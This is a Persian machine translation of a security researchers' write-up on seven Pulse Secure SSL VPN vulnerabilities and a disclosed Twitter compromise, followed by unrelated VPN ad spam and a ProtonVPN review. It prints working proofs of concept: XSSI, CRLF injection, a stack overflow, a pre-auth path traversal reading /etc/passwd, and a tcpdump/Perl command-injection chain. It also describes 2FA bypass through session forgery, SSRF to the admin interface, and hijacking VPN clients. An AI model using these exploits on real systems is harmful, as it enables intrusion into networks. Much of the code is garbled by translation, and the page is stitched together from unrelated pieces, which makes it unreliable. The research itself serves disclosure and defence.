حمله به SSL VPN – قسمت 3: زنجیره ای Golden Pulse Secure SSL VPN RCE زنجیره ای ، با توییتر به عنوان مورد مطالعه!

نویسنده: Orange Tsai ( @ orange_8361 ) and Meh Chang (mehqq_ )

سلام ، این آخرین قسمت از سری Attacking SSL VPN است. اگر هنوز مقاله های قبلی را نخوانده اید ، لینکهای سریع برای شما وجود دارد:

بعد از اینکه تحقیقات خود را در بلک هات منتشر کردیم ، به دلیل شدت زیاد و تأثیرات بسیار زیاد ، توجه و بحث های زیادی را به خود جلب کرد. بسیاری از مردم اخبار دست اول را می خواستند و از اینكه تعجب می شود (خصوصاً Pulse Secure preAuth one) منتشر می شود ، شگفت زده می شوند.

ما همچنین این موضوع را در داخل مورد بحث قرار دادیم. در واقع ، ما می توانیم بدون هیچ گونه نگرانی کل سوء استفاده ها را کنار بگذاریم و افشای رسانه های زیادی را بدست آوریم. با این حال ، به عنوان یک شرکت امنیت ، مسئولیت ما این است که جهان را ایمن تر کنیم. بنابراین تصمیم گرفتیم افشای عمومی را به تعویق بیندازیم تا به دنیا فرصت بیشتری برای اعمال تکه ها بدهیم!

متأسفانه ، سوء استفاده ها توسط شخص دیگری فاش شد. آنها را می توان به راحتی در GitHub [1] [2] [3] و بهره برداری از db یافت [1]. راستش ، ما نمی توانیم بگوییم که آنها اشتباه هستند ، زیرا اشکالات کاملا چند ماه پیش برطرف شده اند ، و آنها وقت خود را صرف متفاوت / معکوس / تولید مثل کردند. اما واقعاً این سؤال است که می توان از جامعه امنیتی سؤال کرد: اگر سلاحی در سطح هسته ای دارید ، چه زمانی برای افشای عمومی آماده است؟

ما شنیده ایم که بیش از 25 برنامه فضل اشکال مورد سوء استفاده قرار می گیرد. از آمار بد پکت ، تعداد زیادی از نیروهای نظامی Fortune 500 ، ایالات متحده ، دولت ، مؤسسات مالی و دانشگاهها نیز تحت تأثیر این امر قرار دارند. حتی 10 سرور ناسا وجود دارد که در معرض این اشکال قرار دارند . بنابراین ، این افشاگری های عمومی زودرس در واقع این افراد را مجبور می کند تا SSL VPN خود را ارتقا دهند ، این بخش خوبی است.

از طرف دیگر ، نکته بد این است که در این میان تعداد فزاینده ای از بات نت ها وجود دارند که اینترنت را اسکن می کنند. اطلاعات همچنین اشاره می کند که در حال حاضر یک گروه چین APT وجود دارد که از این اشکال سوء استفاده می کند. این یک فاجعه اینترنتی است. ظاهرا هنوز جهان آماده نیست. بنابراین ، اگر Palo Alto ، Fortinet یا Pulse Secure SSL VPN خود را به روز نکرده اید ، لطفاً آن را ASAP به روز کنید.

Pulse Secure رهبر بازار SSL VPN است که راه حل های دسترسی ایمن حرفه ای را برای Hybrid IT ارائه می دهد. Pulse Secure مدتهاست که در صف تحقیقات ما قرار دارد زیرا این یک زیرساخت مهم Google است که یکی از اهداف بلند مدت ما است. با این حال ، گوگل مدل امنیتی Zero Trust را اعمال می کند ، بنابراین VPN اکنون حذف شده است.

ما اواسط دسامبر سال گذشته شروع به بررسی Pulse Secure کردیم. در 2 ماه اول ، ما هیچ چیزی دریافت نکردیم. Pulse Secure از شیوه کدگذاری خوب و آگاهی از امنیت برخوردار است به طوری که پیدا کردن اشکالات پیش پا افتاده دشوار است. در اینجا یک مقایسه جالب وجود دارد ، ما در اولین روز تحقیق ما پرونده دلخواه خواندن CVE-2018-13379 را در FortiGate SSL VPN یافتیم …

Pulse Secure نیز عاشق Perl است و تعداد زیادی پسوند Perl را در C ++ می نویسد. تعامل بین پرل و C ++ برای ما نیز گیج کننده است ، اما در حالی که زمان بیشتری را برای حفاری در آن هزینه کردیم با آن بیشتر آشنا شدیم. سرانجام ، ما اولین خون را در 8 مارس 2019 گرفتیم! این یک سرریز مبتنی بر پشته بر روی رابط مدیریت است! اگرچه این اشکال چندان مفید نیست ، از آن زمان پیشرفت تحقیقات ما در حال پیگیری بود و ما اشکالات بیشتری را کشف کردیم.

ما تمام یافته های خود را به Pulse Secure PSIRT در 22 مارس 2019 گزارش دادیم. . پاسخ آنها بسیار سریع است و این آسیب پذیری ها را جدی می گیرند! پس از چندین تماس کنفرانسی با Pulse Secure ، آنها تمام مشکلات را فقط طی یک ماه برطرف کردند ، و تکه های را در 24 آوریل 2019 منتشر کردند. شما می توانید مشاوره امنیتی دقیق را بررسی کنید!

زمان بسیار خوبی برای همکاری با Pulse Secure است. از دیدگاه ما ، Pulse Secure مسئولیت پذیرترین فروشنده در بین کلیه فروشندگان SSL VPN است که ما در این مورد اشکالات را گزارش کرده ایم!

ما در کل 7 آسیب پذیری پیدا کرده ایم. در اینجا لیست است. ما هر یک را معرفی خواهیم کرد ، اما روی CVE-2019-11510 و CVE-2019-11539 بیشتر تمرکز خواهیم کرد.

  • CVE-2019-11510 – خواندن پرونده های دلخواه پیش نویس
  • CVE-2019-11542 – Post-auth ( سرپرست) سرریز بافر Stack Buffer
  • CVE-2019-11539 – تزریق فرمان پس از ات (مدیر)
  • CVE-2019-11538 – Post-auth (کاربر) خواندن پرونده های دلخواه از طریق NFS
  • CVE-2019-11508 – نوشتن پرونده خودسرانه پس از اتمام (کاربر) از طریق NFS
  • CVE-2019-11540 – گنجاندن اسکریپت متقاطع سایت پس از نویسنده
  • CVE-2019-11507 – برنامه نویسی متقاطع پس از اتمام

نسخه های تحت تأثیر

  • Pulse Connect Secure 9.0R1 – 9.0R3.3
  • Pulse Connect Secure 8.3R1 – 8.3R7
  • Pulse Connect Secure 8.2R1 – 8.2R12
  • Pulse Connect Secure 8.1R1 – 8.1R15
  • Pulse Connect Secure 8.2R1 – 8.2R12
  • Pulse Connect Secure 8.1R1 – 8.1R15
  • Pulse Connect Secure 8.0R1 – 9.0R3.3
  • Secure Policy 9.0R1 – 9.0R3.3
  • Security Pulse Security 5.4R1 – 5.4R7
  • Security Pulse Secure 5.3R1 – 5.3R12
  • Policy Pulse Secure 5.2R1 – 5.2R12
  • Security Pulse Safe 5.1R1 – 5.1R15

CVE-2019-11540: مقطع سایت Ript Incociation

اسکریپت /dana/cs/cs.cgi شناسه جلسه را در جاوا اسکریپت ارائه می دهد. از آنجا که نوع محتوا روی Application / x-javascript تنظیم شده است ، می توانیم حمله XSSI را انجام دهیم تا کوکی DSID را به سرقت برسانیم!

حتی بدتر ، محافظت CSRF در Pulse Secure SSL VPN است. DSID با استفاده از این XSSI ، می توان از همه محافظت در برابر CSRF دور زد!

PoC:



 <script  src =  "https: //sslvpn/dana/cs/cs.cgi؟ action = Appletobj" [19659040]> 

CVE-2019-11507: برنامه نویسی متقابل

تزریق CRLF در وجود دارد /dana/home/cts_get_ica.cgi . به دلیل تزریق ، می توانیم هدرهای HTTP دلخواه را جعل کرده و محتوای HTML مخرب را تزریق کنیم.

PoC:

 https: //sslvpn/dana/home/cts_get_ica.cgi
؟ bm_id = x
& vdi = 1
& appname = aa٪ 0d٪ 0aContent-Type :: text / html٪ 0d٪ 0aContent-Disposition :: inline٪ 0d٪ 0aaa: bb 

CVE-2019-11538: Post-auth (کاربر) خواندن پرونده خودسرانه از طریق NFS [19659034] دو آسیب پذیری زیر (CVE-2019-11538 و CVE-2019-11508) بر تنظیمات پیش فرض تأثیر نمی گذارد. به نظر می رسد تنها اگر مدیر اشتراک گذاری NFS را برای کاربران VPN پیکربندی کند.

اگر یک مهاجم بتواند هر پرونده ای را روی سرور NFS از راه دور کنترل کند ، می تواند فقط یک لینک نمادین برای هر پرونده ایجاد کند ، مانند / etc / passwd. ، و آن را از رابط وب بخوانید. علت اصلی این است که اجرای NFS سرور از راه دور را به عنوان یک دایرکتوری واقعی لینوکس سوار می کند ، و اسکریپت /dana/fb/nfs/nfb.cgi بررسی نمی کند که آیا فایل دستیابی شده یک سیمکارت است یا خیر.

CVE-2019-11508: نوشتن پرونده خودسرانه از طریق NFS

این یک کمی شبیه به مورد قبلی است ، اما با یک بردار حمله متفاوت!

وقتی مهاجم آپلود می کند. یک پرونده ZIP به NFS از طریق رابط وب ، اسکریپت /dana/fb/nfs/nu.cgi نام پرونده موجود در ZIP را ضد نمی کند. بنابراین ، یک مهاجم می تواند یک فایل ZIP مخرب بسازد و مسیر را با ../ در نام پرونده طی کند! هنگامی که Pulse Secure فشرده شد ، مهاجم می تواند هر آنچه را که می خواهد به هر مسیری بارگذاری کند!

CVE-2019-11542: Post-auth (مدیر) Stack Buffer Overflow

سرریز بافر مبتنی بر پشته در ماژول Perl زیر وجود دارد. پیاده سازی ها:

  • DSHC :: ThinkForReporting
  • DSHC :: isSendReasonStringEnabled
  • DSHC :: getRemedCustomInstructions

این پیاده سازی ها از sprintf استفاده می کنند تا بدون افزایش طول . این اشکال را می توان در بسیاری از مناطق ایجاد کرد ، اما در اینجا ما از /dana-admin/auth/hc.cgi به عنوان PoC ما استفاده می کنیم.

 https: // sslvpn / dana-admin / auth / hc. cgi
؟ platform = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
و خط مشی = 0

و می توانید خطای بخش را از dmesg

 cgi-server [22950] مشاهده کنید: segfault at 61616161 ip 0000000002a80afd sp 00000000ff9a4d50 error 4 در DSHC.so: [1965909710] CVE-2019: خواندن پرونده های خودسرانه از پیش نویس 

در واقع ، این شدیدترین اشکال در این زمان است. در اجرای سرور وب است. همانطور که اسلایدهای ما ذکر کردند ، Pulse Secure سرور وب و معماری وب خود را از ابتدا پیاده سازی می کند. اعتبارسنجی مسیر اصلی بسیار دقیق است. با این حال ، از نسخه 8.2 ، Pulse Secure ویژگی جدیدی به نام HTML5 Access را معرفی کرد ، این ویژگی مورد استفاده برای تعامل با Telnet ، SSH و RDP توسط مرورگرها است. به لطف این ویژگی جدید ، اعتبارسنجی مسیر اصلی سست می شود.

به منظور اداره منابع استاتیک ، Pulse Secure یک IF-CONDITION جدید ایجاد کرد تا اعتبار سنجی مسیر در ابتدا سخت تر شود. کد به اشتباه از درخواست-> uri و درخواست-> filepath استفاده می کند ، بنابراین می توانیم / dana / html5acc / guacamole / را در انتهای آن مشخص کنیم. رشته پرس و جو برای دور زدن اعتبار و ایجاد درخواست-> filepath به هر پرونده ای که می خواهید بارگیری کنید!

و شایان ذکر است که برای خواندن پرونده های دلخواه ، باید را مشخص کنید. ] / dana / html5acc / guacamole / دوباره در وسط مسیر. در غیر این صورت ، شما فقط می توانید پسوندهای محدود پرونده ای مانند .json ، .xml یا .html را بارگیری کنید.

به دلیل سوءاستفاده در طبیعت ، دیگر هیچ نگرانی برای نشان دادن بارپرداخت وجود ندارد:

 واردات   درخواست 

 r   =   درخواست .  دریافت  ( 'https: //sslvpn/dana-na/../dana/html5acc/guacamole/ .. /../../../../../etc/passwd؟/dana/html5acc/guacamole/'roulette19659042 معروف)ross19659112 معروفprintociation19659106 غلط19659107 با نام های مختلف. ]

CVE-2019-11539: تزریق فرمان پست-auth (مدیر)

آخرین مورد تزریق فرمان در رابط مدیریت است. ما این آسیب پذیری را خیلی زود پیدا کردیم ، اما در ابتدا راهی برای بهره برداری از آن پیدا نکردیم. در حالی که ما در وگاس بودیم ، یکی از دوستانم به من گفت که او قبلاً همان اشکال را پیدا کرد ، اما راهی برای بهره برداری از آن پیدا نکرد ، بنابراین وی به فروشنده گزارشی نداد.

با این حال ، ما این کار را کردیم ، و ما از یک روش بسیار هوشمندانه بهره برداری می کنیم:)

علت اصلی این آسیب پذیری بسیار ساده است. در اینجا یک قطعه کد از /dana-admin/diag/diag.cgi است:

 # ... 
 $ گزینه ها   =   tcpdump_options_syntax_check  ( CGI ::  param  ( "options" ))؛ 

 # ... 
 sub  tcpdump_options_syntax_check   {
   my   $ گزینه ها   =   shift ؛ 
   بازگشت   $ گزینه ها   اگر سیستم   سیستم ] ( "$ TCPDUMP_COMMAND- گزینه های $> / dev / null 2 > & 1 ")   ==   0 ؛ 
   Return   undef ؛ 
} 

آنقدر واضح و واضح است که همه می توانند نشان دهند که یک تزریق دستور در گزینه های پارامتر وجود دارد! با این حال ، آیا این آسان است؟ خیر!

به منظور جلوگیری از آسیب پذیری های احتمالی ، Pulse Secure سختی های زیادی را بر روی محصولات خود اعمال می کند! مانند بررسی یکپارچگی سیستم ، سیستم فایلهای فقط خواندنی و ماژول برای قلاب زدن همه دعوتهای خطرناک Perl مانند سیستم ، open و backtick

این ماژول DSSAFE.pm نامیده می شود. این تجزیه و تحلیل خط فرمان خود را پیاده سازی می کند و دوباره هدایت I / O را در پرل اجرا می کند. در اینجا قطعات کد در Gist وجود دارد.

از قطعات کد ، می توانید ببینید که سیستم اصلی را جایگزین می کند و بسیاری از چک های موجود در __ parsecmd را انجام می دهد. همچنین بسیاری از شخصیت های بد مانند: [

 [&*(){}[]  `؛  |  | ؟  n ~ <>] را مسدود می کند

بررسی ها بسیار دقیق است به طوری که ما نمی توانیم تزریق دستور انجام دهیم. ما چندین روش برای دور زدن آن تصور کردیم و اولین چیزی که از ذهن من بیرون آمد تزریق استدلال است. ما همه استدلالهایی را ذکر کردیم که TCPDUMP پشتیبانی می کند و دریافتیم که دستور [post] postzate -z ممکن است مفید باشد. اما نکته تأسف آور این است که TCPDUMP در Pulse Secure برای پشتیبانی از این ویژگی آبدار خیلی قدیمی است (v3.9.4 ، سپتامبر 2005) ، بنابراین ما شکست خوردیم: (

در هنگام بررسی سیستم ، فهمیدیم که اگرچه پنهان کاری فقط خواندنی است ، ما هنوز می توانیم از مکانیزم حافظه پنهان سوءاستفاده کنیم. Pulse Secure نتیجه این الگو را در / data / runtime / tmp / tt / ذخیره می کند تا سرعت در ارائه اسکریپت سرعت یابد. بنابراین تلاش بعدی ما این است که پرونده را با استفاده از استدلال -w با نوشتن پرونده در فهرست شاخه کش بنویسید ، با این وجود نوشتن یک پرونده چندگلوت در قالب PCAP و Perl غیرممکن است.

همانطور که به نظر می رسد ما به انتها رسیده بودیم. تزریق آرگومان ، ما سعی کردیم تا عمیق تر به اجرای DSSFAFE.pm بپردازیم تا ببینیم آیا چیزی وجود دارد که بتوانیم از آن استفاده کنیم. آیا در اینجا یک نقص در خط فرمان پیدا کرده ایم. اگر ناقص I / O را وارد کنیم. تغییر مسیر ، بقیه قسمت تغییر مسیر کوتاه خواهد شد. گرچه این یک نقص کوچک است ، اما به ما کمک کرد تا کنترل مجدد I / O r را انجام دهیم ویرایش! با این حال ، مشکلی که ما نمی توانیم یک اسکریپت معتبر Perl تولید کنیم ، هنوز برای ما زحمت کشیده است.

ما در اینجا گیر کرده ایم و وقت آن است که از این کادر فکر کنیم. تولید اسکریپت معتبر پرل از طریق STDOUT دشوار است ، آیا می توانیم فقط Perl را توسط STDERR بنویسیم؟ پاسخ بله است. وقتی [TCPDUMP TCPDUMP را مجبور می کنیم که پرونده ای وجود ندارد را از طریق -r-read-file بخوانیم. این خطا را نشان می دهد:

tcpdump: [filename]: هیچ پرونده یا پوشه ای

وجود ندارد. به نظر می رسد ما می توانیم " تا حدی " پیام خطا را کنترل کنیم. سپس نام پرونده چاپ 123 # را امتحان کردیم ، و جادو اتفاق می افتد!

 $  tcpdump  -d   -r   'print 123 #' 
  tcpdump: چاپ 123 #: فایلی یا دایرکتوری وجود ندارد
 
 $  tcpdump  -d   -r   'print 123 #'  2> & 1 | perl -
  123

پیام خطا اکنون به یک اسکریپت معتبر پرل تبدیل می شود. چرا؟ خوب ، بیایید اکنون یک درس Perl 101 داشته باشیم!

همانطور که می بینید ، پرل از برچسب GOTO پشتیبانی می کند ، بنابراین tcpdump : به یک برچسب معتبر در Perl تبدیل می شود. سپس بقیه را با هشتگ اظهار نظر می کنیم. با استفاده از این ترفند خلاق ، می توانیم اکنون Perl معتبر تولید کنیم!

سرانجام ، ما از نماد I / O ناقص < برای فریب فرمان DSSAFE.pm استفاده می کنیم و دستورالعمل را تغییر می دهیم. STDERR را در فهرست حافظه پنهان! در اینجا بهره برداری نهایی است:

 -r $ x = "ls /" ، سیستم $ x # 2> /data/runtime/tmp/tt/setcookie.thtml.ttc <

فرمان جمع شده به نظر می رسد:

 / usr / sbin / tcpdump  -d  
  -r  '$ x = "ls /"، system $ x #' 
 2> /data/runtime/tmp/tt/setcookie.thtml.ttc <
 >  / dev / null
 2> و 1

و تولید شده setcookie.thtml.ttc به نظر می رسد:

  tcpdump:   $ x  =  "ls /" ،  system [19659126] $ x  #: فاقد پرونده یا دایرکتوری 

پس از انجام این کار ، فقط می توانیم صفحه مربوطه را برای اجرای دستور خود واکشی کنیم:

  $  curl https: //sslvpn/dana-na/auth/setcookie.cgi
 boot bin home lib64 mnt opt ​​proc sys usr var
 داده ها و غیره lib از دست داده + ماژول های pkg sbin tmp را یافتید
 ...

تاکنون ، کل بخش فنی این تزریق فرمان به پایان رسیده است. با این حال ، ما فکر می کنیم ممکن است یک روش خلاقانه دیگر برای بهره برداری از این امر وجود داشته باشد ، اگر یکی از آنها را پیدا کردید ، لطفاً به من بگویید!

پس از Pulse Secure تمام اشکالات را در 24 آوریل 2019 وصله کرد. ما برای اندازه گیری زمان پاسخگویی به هر شرکت بزرگ ، نظارت بر اینترنت را دنبال می کردیم. توییتر یکی از آنهاست. آنها به دلیل برنامه bug bounty و هکرها خوب هستند. با این حال ، سوءاستفاده از 1 روز درست بعد از انتشار پچ نامناسب است. بنابراین 30 روز صبر می کنیم تا توییتر SSL VPN خود را به روز کند.

باید بگوییم ، ما در آن زمان عصبی بودیم. اولین کاری که هر روز صبح انجام دادیم این است که بررسی کنیم آیا توییتر SSL VPN خود را ارتقا می دهد یا نه! این زمان فراموش نشدنی برای ما بود: P

ما شروع به هک کردن توییتر در 28 مه 2019 کردیم. در طی این عملیات با موانع مختلفی روبرو هستیم. مورد اول ، اگرچه می توانیم رمزعبور ساده کارمندان توییتر را بدست آوریم ، اما به دلیل تأیید هویت Two Factor ، هنوز نمی توانیم وارد SSL VPN آنها شویم. در اینجا ما دو راه برای دور زدن آن را پیشنهاد می کنیم. مورد اول اینست که مشاهده کردیم توییتر از راه حل Duo استفاده می کند. در کتابچه راهنما ذکر شده است:

امنیت برنامه Duo شما با امنیت کلید مخفی شما (اسکی) مرتبط است. آن را به عنوان اعتبار معتبر خود امن کنید. آنرا با افراد غیرمجاز به اشتراک نگذارید و به هرکسی تحت هر شرایطی آن را ایمیل نکنید!

بنابراین اگر بتوانیم کلید مخفی را از سیستم خارج کنیم ، می توانیم API Duo را برای دور زدن 2FA اهرم کنیم. با این حال ، ما راهی سریعتر برای دور زدن آن پیدا کردیم. توییتر ویژگی Roaming Session را فعال کرد ، که برای تقویت تحرک استفاده می شود و امکان جلسه در چندین مکان IP را فراهم می کند.

به دلیل این ویژگی " راحت " ، ما فقط می توانیم پایگاه داده جلسه را بارگیری کنیم و کوکی های خود را جعل کنیم. برای ورود به سیستم آنها!

تاکنون ، ما می توانیم به اینترانت توییتر دسترسی پیدا کنیم. با این وجود ، هدف ما دستیابی به اجرای کد است! به نظر می رسد مهم تر از دسترسی به اینترانت است. بنابراین ما می خواهیم اشکال تزریق فرمان خود (CVE-2019-11539) را با هم زنجیر کنیم. خوب ، در اینجا ، ما با یک مانع دیگر روبرو شدیم. این رابط مدیریت محدود است!

همانطور که قبلاً اشاره کردیم ، اشکال ما در رابط مدیریت است. اما از نظر امنیتی ، بیشتر شرکت ها این رابط را به صورت عمومی غیرفعال می کنند ، بنابراین ما برای دسترسی به صفحه مدیر نیاز به روش دیگری داریم. اگر مقاله قبلی ما را با دقت خوانده اید ، ممکن است ویژگی " WebVPN " را به خاطر بیاورید! WebVPN یک پروکسی است که به اتصال به هر نقطه کمک می کند. بنابراین ، بیایید به خود متصل شویم.

بله ، SSRF است!

در اینجا ما از یک ترفند کوچک برای دور زدن محافظت های SSRF استفاده می کنیم.

آها! از طریق SSRF ، اکنون می توانیم رابط را لمس کنیم! سپس آخرین مانع بالا آمد. ما هیچ رمزعبور ساده ای از مدیران نداریم. وقتی Perl می خواهد داده ها را با رویه های بومی مانند برنامه افزودنی Perl در C ++ یا وب سرور تبادل کند ، از حافظه پنهان برای ذخیره داده ها استفاده می کند. مشکل این است که Pulse Secure فراموش می کند که داده های حساس را پس از تبادل پاک می کند ، به همین دلیل می توانیم کلمات عبور ساده را در حافظه پنهان بدست آوریم. اما عملاً ، بیشتر مدیران فقط برای اولین بار وارد سیستم خود می شوند ، بنابراین گرفتن رمز ساده متن مدیر سخت است. تنها موردي كه ما دريافت كرديم ، هش رمز عبور در sha256 (md5_crypt (نمك ، ...)) است …

اگر در ترك كردن هشي تجربه داريد ، مي دانيد چقدر سخت است. بنابراین ...

ما یک AWS 72 هسته ای را برای شکستن آن راه اندازی کردیم.

ما هش را شکستیم و RCE را با موفقیت گرفتیم! من فکر می کنم خوش شانس هستیم زیرا از مشاهده ما ، یک سیاست رمز عبور بسیار قوی در مورد کارمندان توییتر وجود دارد. اما به نظر می رسد این خط مشی برای مدیر اعمال نمی شود. طول رمز عبور مدیر تنها ده نفر است و اولین شخصیت آن B است. این در مرحله بسیار اولیه از صف ترک ما است ، به طوری که می توانیم ظرف 3 ساعت هش را بشکنیم.

همه یافته های خود را به توییتر گزارش دادیم و بالاترین امتیاز را از آنها دریافت کردیم. اگرچه ما نمی توانیم اثبات کنیم ، اما به نظر می رسد این اولین اجرای از راه دور کد در توییتر است! اگر به گزارش کامل علاقه دارید ، می توانید برای اطلاعات بیشتر به لینک HackerOne مراجعه کنید.

چگونه می توان چنین حملات را کاهش داد؟ در اینجا چندین توصیه ارائه می دهیم.

اولین گواهی Client-Side است. این همچنین موثرترین روش است. بدون داشتن گواهی معتبر ، اتصال مخرب در طی مذاکرات SSL از بین می رود! دوم تأیید هویت چند عاملی است. اگرچه این بار توییتر 2FA را شکسته ایم ، با یک تنظیم مناسب ، MFA هنوز هم می تواند سطح حمله بی شماری را کاهش دهد. در مرحله بعد ، ممیزی ورود به سیستم را کامل کنید و به یاد داشته باشید که به یک سرور ورود به سیستم خارج از مرز ارسال کنید.

همچنین ، موجودی دارایی سازمانی خود را مرتباً انجام دهید و در مشاوره امنیتی فروشنده شرکت کنید. از همه مهمتر ، همیشه سیستم خود را به روز کنید!

شرکت ما ، DEVCORE ، حرفه ای ترین خدمات تیم قرمز در آسیا را ارائه می دهد. در این بخش جایزه ، اجازه دهید صحبت کنیم که چگونه تیم قرمزها را بیشتر کنیم RED !

ما همیشه می دانیم که در یک عملیات تیم قرمز ، رایانه شخصی از ارزش بیشتری برخوردار است! چندین روش در مدرسه قدیمی برای به خطر انداختن مشتری VPN از طریق SSL VPN قبل وجود دارد ، مانند حمله به سوراخ در آب و جایگزینی عامل VPN.

در طول تحقیق ما ، یک وکتور حمله جدید پیدا کردیم تا همه مشتری ها را به دست بگیرد. این ویژگی " اسکریپت ورود به سیستم " است. تقریباً در هر SSL VPN مانند OpenVPN ، Fortinet ، Pulse Secure ... و موارد دیگر ظاهر می شود. این می تواند اسکریپت های مربوطه را برای سوار کردن فایل پرونده شبکه یا اجرای جدول مسیریابی پس از برقراری اتصال VPN ، اجرا کند.

به دلیل این ویژگی " سازگار با هکرها " ، هنگامی که امتیاز مدیر را گرفتیم ، می تواند از این ویژگی برای آلوده کردن کلیه مشتریان VPN استفاده کند! در اینجا ما به عنوان نمونه از Pulse Secure استفاده می کنیم و نشان می دهیم که چگونه نه تنها SSL VPN را به خطر بیاندازید بلکه کلیه مشتریان متصل خود را نیز به دست می گیرید:

خوب ، در اینجا پایان این سری Attacking SSL VPN است! از یافته های ما ، SSL VPN چنین سطح حمله بزرگی است که محققان امنیتی معدودی در آن حفر می شوند. ظاهراً سزاوار توجه بیشتر است. ما امیدواریم که این نوع سریال بتواند محققان دیگر را به مشارکت در این زمینه ترغیب کند و امنیت شرکت ها را ارتقا بخشد!

با تشکر از همه بچه هایی که با آنها ملاقات کردیم ، همکاری و همکاری داشتیم. ما در آینده تحقیقات خلاقانه تری را منتشر خواهیم کرد:)

.

خرید vpn 2500 تومان خرید ویندوز 7 ارجینال خرید vpn پرسرعت و قوی برای کامپیوتر انتی فیلتر قوی دانلود

خرید vpn 2500 تومان خرید ویندوز 7 ارجینال خرید vpn پرسرعت و قوی برای کامپیوتر انتی فیلتر قوی دانلود

انتی فیلتر گوشی
خرید vpn آن لاین
رمز kerio vpn client
خرید kerio control انتی فیلتر سریع آنتی فیلتر چیست
خرید کریو ارزان
کانکشن تست
کانکشن فیلتر شکن خرید سرور kerio vpn دانلود کانکشن رادیو فردا

Обзор ProtonVPN توسط One One Guy Privacy

Дисклеймер: نظر زیر نظر من است ، كه من سعی خواهم كرد تا نمونه های زیادی را برای تأیید و هرچه بیشتر شواهد ارائه كنم. خوانندگان می توانند اطلاعات بیشتری در مورد نحوه انجام بررسی های من ، روش و روش های دیگر من در اینجا کسب کنند. اطلاعات بیشتر در مورد نشان های بررسی در اینجا.

فهرست این بررسی شماره # 3 بود (در زمان چرخش ، ProtonVPN)

نوشته شده در 16 نوامبر 2017

ثبت نام در این سرویس: تعداد چیزهایی که من در مورد پورتال ایجاد حساب برای ProtonVPN متوجه شده ام. اولین مورد این است که نقشه ها به روشی غیر عادی شکسته شده اند. ارزانترین برنامه ها (رایگان و اولیه) سرورهای کندتری را نسبت به پرداخت ارائه می دهند. این یک چیز بد نیست لزوماً ، غیرمعمول. من عادت داشتم یک آزمایشی را برای مدت زمان محدود یا پهنای باند محدود ، اما کاملاً برجسته مشاهده کنم. برنامه رایگان دارای درگاه های P2P نیز مسدود شده است. طرح "توصیه شده" (بعلاوه) برای یک ماه خدمات بسیار گران بود – 10 دلار در ماه یا 8 دلار در ماه با تخفیف هنگام ثبت نام برای یک سال خدمت.

برای تخفیف های خرید عمده فایده همیشه تعادل وجود دارد. ، و نوعی شمشیر دو لبه است. اگر قیمت پایه یک سرویس قبلاً نسبتاً بالا باشد ، معمولاً تخفیف عمیق برای تعهد بلند مدت نشانگر آن سرویس است که در تلاش است تا از تایمرهای کوتاه یا افرادی که ترجیح می دهند یک برنامه پرداخت ماهانه به ماه را دلسرد کنند. اگر خدمات قبلاً نسبتاً گران باشد ، تخفیف ناچیز انگیزه کافی برای متعهد شدن به برنامه بلند مدت نسبت به یک شرکت مشابه یا بهتر را ارائه نمی دهد. من احساس کردم که قیمت پایه ProtonVPN نسبت به قیمت رقابت آنها نسبتاً بالا است. من گمان می کنم دلیل گرانتر بودن مدل این است که مارک تجاری "Proton" با "ProtonMail" بوده است و مارکی ساخته شده است که احساس می کنند می توانند قیمت بالاتری را بدست آورند.

ProtonVPN همچنین دارای "Visionary" است. "برنامه ، با قیمتی 30 دلار در ماه (با همان 20٪ تخفیف برای یک سال خدمات با ارزش). مزایای افزوده شده استفاده از دستگاه های همزمان بیشتر در شبکه (علاوه بر این در حال حاضر شامل 5 مورد است که معمولاً تمام دستگاه های یک کاربر را کنترل می کند) ، و یک حساب ایمیل ProtonMail Visionary (ممکن است شما با ProtonMail که سرویس ایمیل شرکت بوده است آشنا باشید). سرویس بینایی ProtonMail به تنهایی 24 دلار در ماه است ، بنابراین اگر می خواهید این برنامه (بسیار گران قیمت) باشد ، اگر مزایا ارزش هزینه را داشته باشند ، بر عهده شما خواهد بود.

این نمی تواند یک نکته جزئی تر باشد ، اما من در این صفحه یک دکمه پشتی داشتم – "بازگشت به ProtonVPN.com" (تأکید معدن).

هنگام ثبت نام در خدمت ، شما باید یک آدرس ایمیل ارائه دهید ، که بیشترین کسی است که به حریم شخصی خود نگران است و می خواهد آن را تأمین کند. پرداخت با بیت کوین امکان پذیر است اما در روش های پیش فرض پرداخت در ثبت نام گزینه ای ذکر نشده نیست. برای پرداخت با بیت کوین ، ابتدا باید یک حساب کاربری رایگان ایجاد کنید که احساس می کنم در طی مراحل ثبت نام بهتر توضیح داده می شود. نکته جانبی: هنوز حسابهای رایگان باید تأیید شوند (از طریق ایمیل ، پیامک یا با گزینه ی بیهوده اهدا پول اضافی برای اثبات اینکه انسانی هستید.) پس از وارد کردن کد تأیید ، و کلیک بر روی دکمه "دریافت ProtonVPN" برای تکمیل ثبت نام ، سایت در آنجا نشسته است ، ظاهراً هیچ کاری نکرده است ، تا اینکه دوباره روی آن کلیک کردم و پیغام "نام کاربری قبلاً گرفته شده" را گرفتم. نمی دانم چرا فقط هدایت نشدم ، بلکه بیشتر آزار دهنده بود ، و من توانستم پس از آن به صورت دستی به حساب من وارد شوید. احتمالاً این فقط یک وقفه است.

پیکربندی سرویس: پورتال کاربر ProtonVPN بسیار شهودی و کاربر پسند بود ، اما تنظیمات ، بارگیری ها و غیره همه در سمت چپ صفحه به وضوح برچسب خورده و در دسترس است. منوها برای حرکت ساده و طراحی زیبا بسیار ساده بودند. پیدا کردن دقیقاً آنچه را که لازم داشتم بسیار آسان بود.صفحه بارگیری کاربران پورتال آنها دارای یک سازنده فایل پیکربندی انواع بود ، اما فقط با چند مورد نوری با این حال ، هنوز هم یک ویژگی خوب است ، و من خوشحال شدم که آن را اینجا دیدم. برخی از سرورهای ProtonVPN نمادی از دو فلش دارند که هر دو جهت را نشان می دهند. این نماد دارای افسانه یا ابزار مربوطه نبود ، و من فقط می توانستم به طور مشخص بدانم منظور از استفاده از ابزار بازرس مرورگر من چیست (احتمالاً می توانستم حدس بزنم ، اما این به معنای پشتیبانی P2P است). همه سرورهای ProtonVPN ظاهراً از P2P پشتیبانی نمی کنند ، که جای تأسف است. برای ساختن آن به یکی از بهترین پورتال های کاربرانی که من دیده ام ، نیاز به کمی لهستانی در این قسمت از سایت وجود دارد.

هنگام انتخاب سکوی خود در پورتال بارگیری ، من به خصوص از سایت قدردانی می کنم که مستقیماً شما را به صفحه دستورالعمل ها منتقل کند. . دستورالعمل بسیار آسان برای یک کاربر بی تجربه است. این بسیار عالی بود.

